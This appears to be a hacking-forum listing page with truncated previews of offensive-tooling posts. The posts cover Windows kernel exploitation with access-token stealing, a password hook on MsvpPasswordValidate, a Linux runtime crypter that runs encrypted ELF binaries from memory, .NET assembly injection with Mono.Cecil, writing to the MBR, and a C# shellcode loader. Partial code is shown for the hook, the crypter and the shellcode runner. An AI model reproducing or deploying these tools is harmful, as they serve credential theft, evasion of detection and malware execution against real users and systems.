Tags
|
|
|
Author: SWaNk - Replies: 0 - Views: 2489
Starting with Windows Kernel Exploitation
|
[Image: https://camo.githubusercontent.com/ab469...342e706e67]
Starting with Windows Kernel Exploitation Based on HackSysExtremeVulnerableDriver
Part 1 – setting up the lab
Part 2 – getting familiar with HackSys Extreme Vulnerable Driver
Part 3 – stealing the Access Token
Links:
[hide]
[url=https://hshrzd.word
|
[Windows] Password Hooking with MsvpPasswordValidate
|
[hide]
PasswdHook.c
[code]#include "common.h"
static
BOOLEAN
MsvpPasswordValidate( BOOLEAN UasCompatibilityRequired,
NETLOGON_LOGON_INFO_CLASS LogonLevel,
PVOID LogonInformation,
PUSER_INTERNAL1_INFORMATION Passwords,
PULONG UserFlags,
PUSER_SESSION_KEY UserSessionKey,
PVOID LmSessionKey
)
{
return ((FnMsvpPasswordValidate)g_MsvpPasswordValidate)(
UasCompatibilityRequired,
LogonLevel,
LogonInformation
|
Author: TMZ - Replies: 0 - Views: 3288
Ezuri: Linux runtime crypter with memfd_create
|
A small Golang runtime crypter demonstrating memfd_create syscall usage to run ELF executables from memory in Linux. Works on kernel version is >= 3.17 (relies on the memfd_create syscall).
aes.go
[hide]
[code]
package main
import (
"crypto/aes"
"crypto/cipher"
)
func aesEnc(srcBytes []byte, key string, iv string) []byte {
block, err := aes.NewCipher([]byte(key))
check(err)
encrypter := cipher.NewCFBEncrypter(block, []byte(iv))
encrypted := make([]byte, len(srcBytes))
|
Author: TMZ - Replies: 1 - Views: 3003
Injection with Mono.Cecil
|
This may not be news for everyone but I find it interesting. Mono.Cecil is a impressive work and can provide a lot of cool features such as runtime .NET assembly manipulation. We can inject opcodes (IL instructions) into a target assembly, transforming it as we wish. Here’s the test scenario:
A dummy C# application like the one below, compile it to get it’s executable file, that’s what we need:
[hide]
[code]
using System;
namespace Dummy
{
class Program
{
public static v
|
Author: TMZ - Replies: 0 - Views: 2754
MBR Dump With .NET
|
Years ago I was messing around with Windows MBR (on VXHeaven) and got stuck while trying to write a modified copy back to the disk.
[hide]
[code]
using System;
using System.Runtime.InteropServices;
using Microsoft.Win32.SafeHandles;
using System.IO;
namespace MBR
{
class MainClass
{
[DllImport("Kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
static extern uint SetFilePointer(
[In] SafeFileHandle hFile,
[In] int lDistanceToMove,
[Out] out int lpDis
|
Shellcode execution with C#
|
Your shellcode has to be pasted in C++ format: { 0xDE, 0xAD, 0xBE, 0xEF }
[hide]
[code]
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;
namespace Net_Shellcode_Execution
{
class Program
{
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
[DllImport("kernel32")]
private static extern
|